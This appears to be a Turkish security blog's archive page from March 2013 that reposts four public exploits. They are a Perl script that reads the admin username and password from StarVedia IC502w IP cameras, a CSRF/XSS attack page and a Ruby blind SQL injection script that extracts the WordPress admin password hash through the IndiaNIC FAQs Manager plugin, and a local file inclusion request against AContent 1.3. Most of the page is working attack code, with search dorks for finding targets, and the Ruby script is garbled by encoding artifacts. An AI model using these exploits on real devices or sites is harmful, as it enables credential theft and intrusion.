Archive for 25 Mart 2013

StarVedia IPCamera IC502w IC502w v020313 – Username/Password Disclosure

StarVedia IPCamera IC502w IC502w v020313 – Username/Password Disclosure Açığına ilişkin perl exploit aşağıdaki gibidir.

#!/usr/bin/perl
#
#  [ ] StarVedia IPCamera IC502w IC502w  v020313 remote bypass username/password disclosure exploit
#  Author: Todor Donev
#  Email: todor.donev at gmail dot com
#  Type: Hardware
#
#  Thanks to Tsvetelina Emirska the best friend in my life 
#  and all my other friends for the help and support which 
#  gives me. Kind regards to all of you, who read my lil' 
#  exploits.
#  Bulgaria, Sofia
#  03.2013
#
#  Shodanhq r0x 4 teh lulz!!
#  http://www.youtube.com/watch?v=qNyN1AY-YZQ  Cheeerzz =))
#
#  Another bug, hint: you can edit this code and add some lines for remote change the password.
#####

use LWP::Simple;
if (@ARGV == 0) {&usg;}
while (@ARGV >  0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
}
if ($type eq "-d") {
my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulneruble, $!n");
print " [ ] StarVedia IPCamera IC502w IC502w  v020313 remote bypass username/password disclosure exploitn";
print " [!] Exploiting: $tn";
if ($r =~ m/ <INPUT type=text name=user size=20 maxlength=19 value="(.*)"> /g) {
$result .= "   [o] User: $1n";
}else{die(" Try another exploit, $!");}     
if ($r =~ m/ <INPUT type=password name=passwd size=20 maxlength=19 value="(.*)"> /g){
$result .= "   [o] Password: $1n";
}else{die("Try another exploit or restart the exploitn");}
sleep(1);
print " [m/] BINGO!!!na".$result; 
}
sub usg(){
print " [!] usg: perl $0 [-r or -d]  <victim:port> n";
print " [!]  -d: disclosure password optionn";
print " [!] exp: perl $0 -d 127.0.0.1 :)n";
exit;
}

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Multiple Vulnerabilities

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Versiyonunda bulunan CSRF açığına ilişkin exploit aşağıdaki gibidir.

 <html> 
 <!--
# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF   XSS
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7 squeeze14 with Suhosin-Patch (cli)


##############
# Description:
##############
# IndiaNIC FAQ Settings Page is vulnerable for CSRF.
# The Ask Question area (front-end) is vulnerable for XSS. It is possible to insert  <script> alert(1) </script>  in question parameter.
# The Captcha value can be read from captcha parameter (hidden field)
#



###################################
#### Part of Ask Question form ####
###################################
 <form action="" method="POST" name="iNICfaqsAskForm_1"> 
 <input type="hidden" value="1" name="group_id"> 
 <input type="hidden" value="1" name="from_user"> 
 <input type="hidden" value="inic_faq_questions" name="action"> 
 <input type="hidden" value="5540" name="captcha">     <=================== We don&#39;t need the captcha Image when we have this xD


####################################################################
#### Request from Ask Question area (XSS in question parameter) ####
####################################################################
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:9001/wordpress/?p=11
Content-Length: 143
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala@gmail.com&question=XSS TEST  <script> alert(1) </script> ?&captcha_code=8560

# When admin navigate to Question-Area (back-end) arbitrary JavaScript will execute.



#######################################################################
--> 
	 <title> Download </title> 
 <body> 

	 <!-- replace "127.0.0.1:9001/wordpress" --> 
	 <form action="http://127.0.0.1:9001/wordpress/wp-admin/admin-ajax.php" method="POST"> 
	 <input type="hidden" name="action" value="inic_faq_settings" /> 
	 <input type="hidden" name="alert_email_address" value="m3tamantra@127.0.0.1" /> 
	 <input type="hidden" name="capture_email" value="1" /> 
	 <input type="hidden" name="notify_when_answered" value="1" /> 
	 <input type="hidden" name="listing_template" value="lalalalalalalalalalalalal" /> 
	 <input type="hidden" name="custom_css" value="babaaaaaammmmmmmm" /> 
	 <input type="hidden" name="custom_js" value="alert(1234)" /> 
	 </form> 
	 <script> document.forms[0].submit(); </script> 

 </body> 
 </html> 

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Blind SQL Injection

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Blind SQL Injection açığı bulunmuş olup, Açık ve Açığın oluşum yerleri hakkıda exploit

# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin Blind SQL Injection
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7 squeeze14 with Suhosin-Patc=
h (cli)

##############
# Description:
##############
# The “order” and “orderby” parameter is vulnerable for SQL Injection
# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=3Din=
ic_faq&orderby=3D
# PoC take some time to finish (15min on my Testsystem).
# I could speed it up with Multithreading but I'm to lazy right now

#### Vulnerable code part (wp_list_table.php) #############################=
###################################
#
# function prepare_items() {
# $this-> _column_headers =3D array($this-> _columns, $this-> _hidden_columns=
, $this-> _sortable_columns);
# $sort_order =3D isset($_GET['order']) ? $_GET['order'] : “ASC”;
# $orderby_column =3D isset($_GET['orderby']) ? ” ORDER BY {$_GET['orderby=
']} {$sort_order}” : false;
#
# global $wpdb;
# if (is_array($this-> _sql)) {
# if ($orderby_column =3D=3D false) {
# $data =3D $this-> _sql;
# } else {
# $data =3D $this-> _sql;
# usort($data, array(&$this, 'usort_reorder'));
# }
# } else {
# $data =3D $wpdb-> get_results(“{$this-> _sql}{$orderby_column}”, ARRAY_A=
);
# }
###########################################################################=
#####################################

#################################
#### Blind SQL Injection PoC ####
#################################
require “net/http”
require “uri”

$target =3D “” # EDIT ME #
$cookie =3D “” # EDIT ME # authenticated user session

# Example:
#$target =3D “http://127.0.0.1:9001/wordpress/”
#$cookie =3D “wordpress_a6a5d84619ae3f833460b386c064b9e5=3Dadmin|13640405=
45|86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=3Deditor=html; wp-se=
ttings-time-1=3D1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5=
=3Dtony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=3Dtony@bau=
er.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=3Dhttp://s=
ucker.de; wordpress_test_cookie=3DWP Cookie check; wordpress_logged_in_a6a5=
d84619ae3f833460b386c064b9e5=3Dadmin|1364040545|d7053b96adaa95745023b91=
694bf30ef; PHPSESSID=3D1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage=
=3D1”

if $target.eql?(“”) or $cookie.eql?(“”)
puts “n[!]tPlease set $target and $cookie variablen”
raise
end

$chars =3D [“.”] (“a”..”z”).to_a (“A”..”Z”).to_a (“0”..”9″).to_a
$hash =3D “$P$”
$i =3D 0 # chars index
$j =3D 4 # hash index

def sqli_send()
sqli =3D URI.escape(“(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$=
j}, 1)) FROM wp_users WHERE id =3D 1) =3D #{$chars[$i].ord}) THEN 1 ELSE 1*=
(SELECT table_name FROM information_schema.tables)END) –“)
uri =3D URI.parse(“#{$target}wp-admin/admin.php?page=3Dinic_faq&orderby=
=3D#{sqli}”)
http =3D Net::HTTP.new(uri.host, uri.port)
#http.set_debug_output($stderr)
request =3D Net::HTTP::Get.new(uri.request_uri)
request[“User-Agent”] =3D “Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;=
rv:19.0) Gecko/20100101 Firefox/19.0”
request[“Cookie”] =3D $cookie
resp =3D http.request(request)
if( resp.code !=3D “200” )
puts “something is wrong response =3D #{resp.code}”
raise
end
# In WordPress default settings there will no SQL error displayed
# but when an error apperes we don't get any result.
# The PoC search for “No record found” and suppose there was an error
return resp.body().match(/No record found/)=20
end

def print_status()
output =3D “HASH: #{$hash} try #{$chars[$i]}”
print “b”*output.length output
end

while( $hash.length < 34 ) if( !sqli_send() ) $hash =3D $chars[$i] $j =3D 1 $i =3D 0 else $i =3D 1 end print_status() end puts "n[ ]thave a nice day :-)n" [/sourcecode]

AContent 1.3 – Local File Inclusion

AContent 1.3 – Local File Inclusion açığı bulunmuş olup, Açığın oluşum yeri Aşağıdaki gibidir

##########################################
[~] Exploit Title: AContent 1.3 Local File Inclusion
[~] Date: 21-03-2013
[~] Author: DaOne
[~] Vendor Homepage: http://atutor.ca/acontent/
[~] Software Link: https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download
[~] Category: webapps/php
[~] Version: 1.3
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6
##########################################

# Exploit
POST http://localhost/AContent/oauth/lti/common/tool_provider_outcome.php HTTP /1.1

grade=1&key=1&secret=secret&sourcedid=1&submit=Send Grade&url=../../../include/config.inc.php

-end-